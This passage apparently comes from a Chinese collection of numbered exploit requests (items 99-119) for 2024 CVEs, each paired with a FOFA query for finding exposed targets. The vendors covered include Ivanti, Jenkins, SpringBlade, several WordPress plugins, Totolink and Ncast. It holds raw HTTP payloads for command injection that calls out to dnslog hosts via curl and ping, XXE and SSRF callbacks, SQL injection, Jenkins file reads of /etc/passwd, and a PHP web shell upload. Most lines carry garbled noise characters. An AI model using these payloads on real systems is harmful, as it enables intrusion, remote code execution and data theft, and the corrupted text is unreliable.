. L' \' F! J) H& \0 y8 nAccept: */*" p! d& [1 I2 N5 I$ L v
Accept-Encoding: gzip, deflate
. r9 w5 q3 G" @1 R/ f7 J$ fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, R9 }3 ?) h4 l5 R& n9 \* |Content-Type: application/x-www-form-urlencoded; charset=UTF-8; v* L# Y* |0 N0 g6 G: a# J( \
X-Requested-With: XMLHttpRequest
7 W( d$ o* g2 b" P
# V) ]4 K7 R( v uid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B* m. E# Q( a4 f
$ |! b' m4 d0 z$ \7 \- }
: O' J9 x+ J# r! j99. Ncast盈可视高清智能录播系统busiFacade RCE
+ [1 w. d) R8 S- w. {: c' A# pCVE-2024-0305
! r0 B6 O0 P% Z( c" U* uFOFA:app="Ncast-产品" && title=="高清智能录播系统"$ p9 i5 \ {, {7 u0 y
POST /classes/common/busiFacade.php HTTP/1.1
7 S5 q8 a- T) T$ A* J5 qHost: 192.168.40.130:8080
9 P; T' h u L- i6 q% g2 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 B/ H4 ?4 F# i* v, j* ^& H0 N1 S
Connection: close
1 Q( \6 a% w( Q1 r1 gContent-Length: 154) C; n! Z8 T. y" k9 \- _
Accept: */*
+ q/ V( B+ _- I" dAccept-Encoding: gzip, deflate
. [! K. o. u8 o5 E HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ v: l& ^0 y+ C( V
Content-Type: application/x-www-form-urlencoded; charset=UTF-83 j, w, D4 e( [/ a9 T9 o. f
X-Requested-With: XMLHttpRequest8 h J# X) l1 ?5 v& W" \
' \* W; N) j* {% W, k& t
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
8 W' m7 D- C+ T) G- R* S
) O% j: r; ?! ?! G1 D
+ K8 _, O8 Z8 x, j) ^) |100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
1 P5 f+ v3 O$ Z( NCVE-2024-03520 s1 n- n+ c2 K9 A3 q) ~
FOFA:icon_hash="874152924"
0 W4 }5 A1 _+ f0 l0 FPOST /api/file/formimage HTTP/1.1
- j5 ^/ g4 \( g l4 i' RHost: 192.168.40.1305 v" a' w0 X3 x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
$ R; r& L3 g' W1 |2 Y+ X4 N3 lConnection: close
5 h; Y) H( G2 k! wContent-Length: 201! B+ e" K& w$ l; U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
& M2 N4 V9 L2 k" I+ f/ }; l/ mAccept-Encoding: gzip' `3 S0 g2 |9 I' w
3 R6 H1 d- S- Z9 N* c B
------WebKitFormBoundarygcflwtei
: W! D$ J. p1 k {4 z+ f* |5 ], cContent-Disposition: form-data; name="file";filename="IE4MGP.php"
. Y0 r: |5 d7 C7 {Content-Type: application/x-php
! f; ?8 j; p' l% @3 }$ ~' G
5 T4 d1 ?& [4 |' q% R2ayyhRXiAsKXL8olvF5s4qqyI2O
6 `9 G/ N' X# r3 B& k* t1 {- g------WebKitFormBoundarygcflwtei--& [# h+ U6 J7 y) j
( ?1 F( w% @, p* E/ \& j
5 F3 t! u) d q% r; |: n s0 S101. ivanti policy secure-22.6命令注入
# j+ F9 D3 ^7 f: }5 B1 u' DCVE-2024-21887( c: g% \) [5 i2 Z, G& Z) f6 N8 p
FOFA:body="welcome.cgi?p=logo") ~4 {+ ^! r. `, u. ?0 x% ?& s
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
4 i9 `( I5 i# @: a" {Host: x.x.x.xx.x.x.x) y" z7 ?7 K: m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& e2 O" A& F9 D1 L
Connection: close% W. ^9 r* z0 p# i1 @) a1 j- x) t" T
Accept-Encoding: gzip! |$ B \; D, C' y0 N
6 L6 B2 a/ H0 v+ G `3 V" e: N1 f* J
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行' E) h$ }3 n7 p, ]
CVE-2024-21893" N( A& I! ^7 r- k0 E
FOFA:body="welcome.cgi?p=logo"8 E- `) ~- K. y; p ?6 n9 Z
POST /dana-ws/saml20.ws HTTP/1.1
, f7 l3 @/ [7 |Host: x.x.x.x
! e |3 P, Q6 e* k. pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36- U. x! {4 \- W
Connection: close8 w) {4 h7 X7 H* s% J3 H
Content-Length: 792
3 T, ]; j/ _8 _9 h9 S( D/ DAccept-Encoding: gzip
. ?" \, B b5 t# M8 `% g1 h4 `, a" p% F1 V* h# I& O! t4 \
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
o _! z- Z# R- T& s) i! i. V4 v( b$ Q3 @; U1 v
103. Ivanti Pulse Connect Secure VPN XXE5 {1 h2 Q9 ?3 Z- L- C5 `
CVE-2024-22024, M _# O8 @- C( h
FOFA:body="welcome.cgi?p=logo"+ W# a$ X- i1 Y
POST /dana-na/auth/saml-sso.cgi HTTP/1.11 Z& p; T; J0 }8 |) Q4 u0 h
Host: 192.168.40.130:111- T B/ L: }5 n* t( u
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36/ p& M! N3 r! j7 |% C) i
Connection: close1 I3 u3 V3 F$ w3 Z1 l6 S5 B! s
Content-Length: 2045 ^- y9 B, h+ O3 ]7 A% c% M
Content-Type: application/x-www-form-urlencoded# Z) @ _( T/ L/ M! v
Accept-Encoding: gzip( N# y0 f3 l' w& u/ ]8 W x8 S1 b7 S* l
% a$ r5 b3 O8 m% D# ^5 q% w+ f7 q
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==& a# e5 [" R- k3 l" ]
! W, _( ~2 @8 x. m: x6 m4 y0 I) X3 I% N0 Y# E/ J, Q
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
5 e4 ~+ z# r1 \# E4 V+ J* C6 m# k<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
% _/ o7 N' j3 x H" s: W" E% `" x$ T) Y7 ]+ s1 d4 ^% ^
( m8 w1 U/ i" n8 ^104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
" k! j. `# n+ j F$ ICVE-2024-0569
; p, Z- I% M. R Z( ^% yFOFA:title="TOTOLINK"
( }$ Y' f( g% q" @POST /cgi-bin/cstecgi.cgi HTTP/1.10 |# b# w7 g- g' m, P
Host:192.168.0.15 z, O U% J0 t: O$ |- k
Content-Length:41
2 V5 Y& q5 E b0 @$ u, D NAccept:application/json,text/javascript,*/*;q=0.01
: w0 t' w& t" aX-Requested-with: XMLHttpRequest+ G3 A# D) w9 `3 ~$ Z# w& e
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
+ e3 G J- m' X8 EContent-Type: application/x-www-form-urlencoded:charset=UTF-8
6 ~8 o6 r( z% z8 Y: \; {Origin: http://192.168.0.1$ A" D3 j1 N5 P1 o# o. L
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
K) E& S3 `8 a8 I [9 W& sAccept-Encoding:gzip,deflate
2 G* A, q; h% V1 o8 e7 _) mAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7; V/ a/ [' C# i- G1 ?. H
Connection:close/ ~( |! d! E- e; f
8 q+ y1 }. c7 m- f4 H2 H{, V/ i5 X+ E9 w6 c; ^! @! K8 z. C
"topicurl":"getSysStatusCfg",
" g: j) Q$ O) H! v' x( M"token":"" ?* g1 ]9 p3 ]5 ]( k/ w
}- `; n( k; V- t j! l) S* I
* `1 n7 G1 P/ G; m1 F! q* v
105. SpringBlade v3.2.0 export-user SQL 注入! o" @" |2 c4 m4 X$ K
FOFA:body="https://bladex.vip"7 [9 C; E" g$ a2 T0 S- k9 S
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
, h" v3 [4 x5 U) L( M
# K; R% B2 A* A4 U106. SpringBlade dict-biz/list SQL 注入
' o( @" o9 y4 g$ y" QFOFA:body="Saber 将不能正常工作"5 x* l# J- ^* {+ Z+ p) r7 R0 U* E
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
! r1 ?" o4 R3 p; W# ~Host: your-ip3 l* F- R; e; A0 t) E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, A) B- K* z* W( o7 x( s& |7 lBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
) J6 u2 T2 B) E+ [" n" mAccept-Encoding: gzip, deflate
! F/ l F( T: a: ~- L7 FAccept-Language: zh-CN,zh;q=0.9
5 P: s% J3 C* Y& M% W0 X# f4 S" s6 TConnection: close
! Z3 i* \( H( Q3 e5 K* _2 x
1 f3 y$ G4 S' {! |# N, O& i9 ]) k; y3 d) l. c" n3 r
107. SpringBlade tenant/list SQL 注入' i( w1 ?6 g+ @! c' |9 o9 D U
FOFA:body="https://bladex.vip"' k, @& _6 { M/ ?! V
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" h8 Y! z, ^' g4 ]0 j
Host: your-ip- i; S# p/ Z: D- t8 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- R. V+ ~2 R. k" u7 F) T- s
Blade-Auth:替换为自己的
' |- t9 D- `4 ?Connection: close: `, z! n% R. r0 r
9 K& w. T1 J$ @# g7 n
2 |- [& ^ K: o0 P1 D/ c2 l* y
108. D-Tale 3.9.0 SSRF! z' Q6 k' G' `5 Z* \- I
CVE-2024-216423 R; X8 i) O0 v! V
FOFA:"dtale/static/images/favicon.png"
, ~5 j0 [$ O# s# @7 W. b4 PGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1( U, X, j |0 y0 @% x7 r
Host: your-ip
- {: b$ h% _2 {! T# i7 IAccept: application/json, text/plain, */*" B, X/ M1 u U, A5 s3 Z: s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 x: G0 u& q5 |2 mAccept-Encoding: gzip, deflate( ~2 V6 n3 I# o2 ]
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8. l6 `4 o- O7 r
Connection: close
* v$ Y# v5 n( f( @$ N2 f) B$ [* | B& o
' p4 d% ]# m5 j4 n) H( @' x4 j9 q" S' F" C, D2 Z0 a6 g% W8 u8 ~" |* R& @
109. Jenkins CLI 任意文件读取2 b9 ?0 [* R; j5 w" a) H( i6 ~( q
CVE-2024-23897
! T" W& N0 n5 a: X9 eFOFA:header="X-Jenkins"
$ w0 ]) X/ g4 _POST /cli?remoting=false HTTP/1.1
% r, y( D$ n) ~$ F0 mHost:
' M6 a! i- V& m6 }( g, s$ f; |Content-type: application/octet-stream
~! Q5 l0 b; x0 f' m2 YSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
2 X; F8 m6 S1 N2 RSide: upload
# N" P/ y! K) q- I q* [Connection: keep-alive" |9 Z' D# x {: _" c K2 @- U
Content-Length: 1635 f) D" ?( ^$ c* R9 H
1 ~; c3 H: g6 Sb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
5 h( }3 d8 h( O+ B9 a
8 ?" w- w* n3 W0 P* z& _- j. u
$ Z0 ^/ ~% S& C: w( E, w: ]POST /cli?remoting=false HTTP/1.1- F1 Y2 t1 M3 q
Host:
) P- j% Q) u' r6 \: r3 t; KSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92* I$ d5 J$ `$ A. g9 V6 t7 S; ~
download9 X2 m5 Q$ x9 h9 y1 t
Content-Type: application/x-www-form-urlencoded/ v* J& r7 t: u0 B
Content-Length: 0
3 V9 A4 i! p% b4 H2 g
% n! ]; n, r; T3 D, f
( E5 O+ y' J4 g2 o6 {& jERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
7 g& u+ h b# |9 Njava -jar jenkins-cli.jar help! ~. O7 l) L4 ^
[COMMAND]
# p# |; Q, I" \8 \Lists all the available commands or a detailed description of single command.( c( q4 G4 r3 W8 K) E/ g" S
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)' }1 F) s8 Q& o. g. v
! H6 m6 c# j n" T7 \/ ~
3 k" j) j; R/ N1 M" |3 P110. Goanywhere MFT 未授权创建管理员; t. _0 r+ U8 o- z/ W* I$ y
CVE-2024-0204' N' Z: u7 [" C: L! j X a& N# v
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"% F8 r& v" f% v: K1 D
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
) Z3 s/ `# N ^2 f2 `) m/ B6 h% BHost: 192.168.40.130:8000
: c8 Q- s/ V& I5 T# LUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
! T" E$ Z1 D8 M5 E- s& M) HConnection: close; W* D# X, Y% `1 S3 q
Accept: */*9 F# {7 Y( D# Y# w
Accept-Language: en
- `$ b, ^% s: n* _$ HAccept-Encoding: gzip
+ U* i; S' u% z4 w) h
5 J5 B# B: y; M$ y# B/ e& k* @7 E
% I2 i" z1 {! U111. WordPress Plugin HTML5 Video Player SQL注入
; a" a+ y, X8 R, ^$ A3 rCVE-2024-1061* k) O. R4 X4 `8 c1 r j& e4 s4 ^3 F+ e
FOFA:"wordpress" && body="html5-video-player"
+ {& P7 N- |3 X7 [2 Z9 VGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.10 M8 j4 v0 t6 q
Host: 192.168.40.130:112. S3 p' @9 h' J1 U5 }! p
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 {( h2 s4 j0 D/ i Q
Connection: close. a0 r* x6 T) F; E' x" l. f7 N9 z& S
Accept: */*
' R2 A0 E7 W% W. V. `, A" HAccept-Language: en6 T! D5 y# x+ E: m4 i* m
Accept-Encoding: gzip
9 b0 }2 }) x/ m+ v3 p( x9 E1 O8 X; T" Z1 k, a% }
! s0 F) {8 r4 L, M. l/ y% Y112. WordPress Plugin NotificationX SQL 注入
7 y$ R3 Q( s t) r7 @4 SCVE-2024-1698# b& w5 i. [: _0 A+ J0 g8 w
FOFA:body="/wp-content/plugins/notificationx"3 b9 b5 `0 _8 t N/ i
POST /wp-json/notificationx/v1/analytics HTTP/1.1" j7 c' H* z9 n% t. Z" v3 W( a
Host: {{Hostname}}2 G( k" j' K- h i
Content-Type: application/json# a; M& R8 e: c+ i+ J6 G+ t$ J( a
/ D9 W/ j: y6 m2 l" n5 \0 d; N
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
1 B7 O* y+ V+ g1 | P
" z/ x' i$ y: h8 k0 O _: L( Y: E0 i, V8 s1 y# o; u z$ B% C
113. WordPress Automatic 插件任意文件下载和SSRF
8 k0 h6 W+ {1 P$ @- Y& rCVE-2024-279545 w- J: h; _/ L" P1 f9 ~" S# n/ G
FOFA:"/wp-content/plugins/wp-automatic"4 @5 @/ @7 ^8 ?" Y: t o. x
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1' M+ |" O0 o0 X# E b$ t
Host: x.x.x.x
: p$ M$ W: R2 K1 ?% oUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
9 @1 ]- G1 I6 f( v% RConnection: close& \) r# E) c0 |
Accept: */*
) y3 k- [1 L7 M8 \; NAccept-Language: en
1 p. Z# q% ~" ]+ u3 |8 y, gAccept-Encoding: gzip, `! @9 r% k& C% w7 v3 L
' s% _% t7 _ j! B4 j; _0 i& H, P) [& p$ ^0 J: e, a% A% n
114. WordPress MasterStudy LMS插件 SQL注入: R, ]. S5 T- }! ?: A- J
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
) q6 _& `; G: I9 u9 NGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
' W1 x# {. {) `7 j* JHost: your-ip
; t" U g$ T, r6 mUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.368 P/ N5 b5 S/ `, X, m) X
Accept-Charset: utf-8, O% G# O$ V, H
Accept-Encoding: gzip, deflate
- u1 z; ^6 D3 Q7 OConnection: close" r/ i6 W2 S6 n; K( O, i
6 m( I4 r f% x* O) ~3 F9 H' M0 `
115. WordPress Bricks Builder <= 1.9.6 RCE
2 t/ f' q; Z( W$ w7 {. MCVE-2024-256007 f% D" Y7 w4 _ p: i. g
FOFA: body="/wp-content/themes/bricks/"' }6 G9 M: j9 W1 L
第一步,获取网站的nonce值
) F* l+ l$ L; c' B7 a$ E9 ]2 {GET / HTTP/1.1: B( v% p- h# e- b+ }! w1 b
Host: x.x.x.x2 m7 U+ z9 {5 X2 J: w {1 I5 Z4 f
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
6 Q6 G6 |/ Y" j8 G8 m# |Connection: close
& i0 B% j& l3 {, A' |% cAccept-Encoding: gzip$ x! t! A T" V' l- h
B( _+ b+ b Q( s; G! L
( w6 B; v4 Y7 H7 v第二步替换nonce值,执行命令
- z' H- e" m" p' X$ l) YPOST /wp-json/bricks/v1/render_element HTTP/1.1
& C( l9 U$ q* R' ?/ gHost: x.x.x.x
~ j7 d, \: w( P. t. d6 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 r/ B3 `! k1 {8 jConnection: close- n2 ~0 u. l3 R# ]" q
Content-Length: 356. H" I1 k4 U, r8 |8 j5 r
Content-Type: application/json
1 v7 p. y$ a- F: M: T8 Q. i5 E1 b: i) ?Accept-Encoding: gzip& g( i5 r' i% i1 V
2 `" _. q; E9 @ `: p) e
{
+ I$ W$ ^' s" S1 n3 q8 `"postId": "1",. u" C( N' y% h( b
"nonce": "第一步获得的值",
) W% `) b; @% J3 s) w3 v2 q "element": {
* P5 h% O, v5 R$ G& a6 [( O v "name": "container",- o# ?6 @* P4 L+ A( H4 P/ E) Q
"settings": {
- `0 e: j+ ?' [9 h% ?! N9 | "hasLoop": "true",# P, }# Z, T/ V$ E2 O% H
"query": {9 ?: {9 C- r c
"useQueryEditor": true,
# x& @3 c V/ k "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
: f& M8 M3 p7 i* l5 v0 O6 b( C "objectType": "post"
4 c: ?, Q% X) `# T0 A }
" o$ M9 h. r9 K$ u) B" M. P }) q: ~3 y4 W/ b( a3 g9 e5 p
}5 e" n7 w- x" ~, t8 a
}; r' {: O. ~* S' _
2 i! r+ m5 @& d. b4 q
- v3 G+ H' P- o* D! b116. wordpress js-support-ticket文件上传
% r4 @9 ]* E3 i$ Y5 eFOFA:body="wp-content/plugins/js-support-ticket"
5 r* z; q4 W) w& E3 VPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
7 `5 [3 X" G/ t7 v, r2 h6 S J3 nHost:
8 \6 K9 s, N3 c# @. O6 f1 KContent-Type: multipart/form-data; boundary=--------767099171
: Q* u7 a$ T# I+ F3 x& ]' SUser-Agent: Mozilla/5.0
' V& q1 D9 X3 x* j& I. k* H: ]1 @6 ^6 C F
----------767099171
: q/ W. |1 d' E5 [8 x+ O6 ~Content-Disposition: form-data; name="action"" n* {2 a1 U* u6 }. L/ z
configuration_saveconfiguration) k+ Q; f& U8 M: _2 l) K
----------767099171
" `1 N" k [5 s8 |: h- s' y# n+ S- PContent-Disposition: form-data; name="form_request". S4 t1 P, @+ y+ ^$ F
jssupportticket9 v" Q( z6 O/ W. L1 S. S' s: |
----------767099171( e0 i( S) }1 X( S: w$ o
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"0 A' @3 A. y6 D9 o, ^
Content-Type: image/png
5 j0 I4 t2 ]3 j# L' \3 B5 E+ n* M----------767099171--
, R# P+ n. H. l+ C0 e* T. D& Q1 `% w6 a9 B& N
( r/ S4 S' c# y2 y) _117. WordPress LayerSlider插件SQL注入/ N1 c4 d" [5 x- u
version:7.9.11 – 7.10.0
S% N: P- l) ?FOFA:body="/wp-content/plugins/LayerSlider/"0 }- ~6 l2 a5 ]8 D' J' i n. U
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1* r' k/ Y# A8 B/ b
Host: your-ip
: E; V: k5 q: L GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
6 i! O& J* y8 i+ eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 a, R0 ^+ l+ k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. M. |! K) m/ S6 b' H0 c
Accept-Encoding: gzip, deflate, br
2 y4 H9 k2 k0 YConnection: close% `' D$ c! o! q0 x
Upgrade-Insecure-Requests: 1/ Z+ D. L J d- R
; P3 e- x9 s3 |* O0 L8 N* d. }
, L( L# \9 c( m
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传 g2 T) F0 y7 v3 Y
CVE-2024-0939
; X! @# p1 K G% g( ]FOFA:title="Smart管理平台"
B/ B; V& X% [+ y# IPOST /Tool/uploadfile.php? HTTP/1.1
0 ^- U6 e8 a5 s2 x( t+ Z: dHost: 192.168.40.130:84430 e, W9 z& n) g. h* N
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
5 d* u7 y9 q! | EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
9 W$ r$ w8 c8 { W5 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ V3 H7 X6 G( V& v0 f0 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 S- \# M5 ?$ f" vAccept-Encoding: gzip, deflate
( M( V+ y$ e: l( ]8 vContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887' _& m R5 R/ F/ {+ ~# Q
Content-Length: 405
: m, t$ \1 q8 a: `Origin: https://192.168.40.130:8443' `+ z- e& o ?% K6 Q: ~
Referer: https://192.168.40.130:8443/Tool/uploadfile.php0 \, y) i& ^$ M( V3 L" M2 B4 K
Upgrade-Insecure-Requests: 1
% u5 n. J8 ?2 f6 p' FSec-Fetch-Dest: document
# ^8 D9 K2 @( N) S4 f$ {" H& N2 oSec-Fetch-Mode: navigate
( [0 ~* [5 p1 I! `* `+ ?Sec-Fetch-Site: same-origin+ w% K- F# s/ ^
Sec-Fetch-User: ?15 `0 H$ H& a! `: g8 d' ~, Y
Te: trailers; I3 y1 q; S# O9 Q% n5 B% Y
Connection: close
. B: C( t7 a7 Y( a6 j+ Z# V9 f7 b+ x* i
" o9 R" F& k0 n( i# R y; z2 c1 E$ w) j-----------------------------13979701222747646634037182887
! o+ U( o6 W/ n' }. H: jContent-Disposition: form-data; name="file_upload"; filename="contents.php"
5 L. k3 U* ~9 n+ k+ oContent-Type: application/octet-stream
1 Q. R) f$ e/ \7 W3 ]
2 S0 J4 }, U5 n2 w8 O<?php3 ]5 }* R* \& e
system($_POST["passwd"]);4 A0 [1 Q8 T) b! ~
?>
$ ]3 h& E% c" g4 u0 i& K+ v-----------------------------13979701222747646634037182887
8 A0 H! ?8 E9 O) d) t I4 oContent-Disposition: form-data; name="txt_path"
& N3 I! X6 S& t% Z6 S
C. p/ q" z; u- x3 U/home/src.php
) V: |% s- y) A9 m! M9 w- Y% j-----------------------------13979701222747646634037182887--
/ q7 g7 ^2 F+ m- g, E8 W$ m& ~" q9 s4 A9 Z N. s
! q. m6 d7 K* j5 d- O/ H) a# v4 f访问/home/src.php; t, r2 l# K5 f7 a: r: J
]1 n# }& G8 A& L% q119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 `2 c( f$ P. g& X8 oCVE-2024-1254
; S. n% W) `4 p3 l" UFOFA:title="Smart管理平台". T6 h: z, S# D9 B, ~$ N5 s2 f
先登录进入系统,默认账号密码为admin/admin) z: w# s. t: ?' _+ H- z: h7 q
POST /sysmanage/sysmanageajax.php HTTP/1.11$ H. I/ V" C7 X- {% }' O6 c/ g
Host: x.x.x.x$ l. l1 R7 i: O1 P5 N% a
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
1 G8 @ N5 }0 [( q2 A& BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
( k* f- |6 d5 L( z+ D& o. I( ^5 zAccept: */*
7 e6 A7 e7 n* C9 U/ z6 ~ |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 |( ]0 o6 T4 cAccept-Encoding: gzip, deflate& s! {2 U4 ]% k+ [6 ]
Content-Type: application/x-www-form-urlencoded;
. S; E' A8 S& O7 v+ tContent-Length: 109
8 ]) h7 A; f& O2 w/ SOrigin: https://58.18.133.60:8443- N# Q4 h( _+ R! {8 _0 ?+ B0 M4 F0 z
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
$ T6 w$ [9 U5 U% \Sec-Fetch-Dest: empty! V% R5 S: O% Y/ v
Sec-Fetch-Mode: cors4 h' e" G! U( _" J3 F! w
Sec-Fetch-Site: same-origin
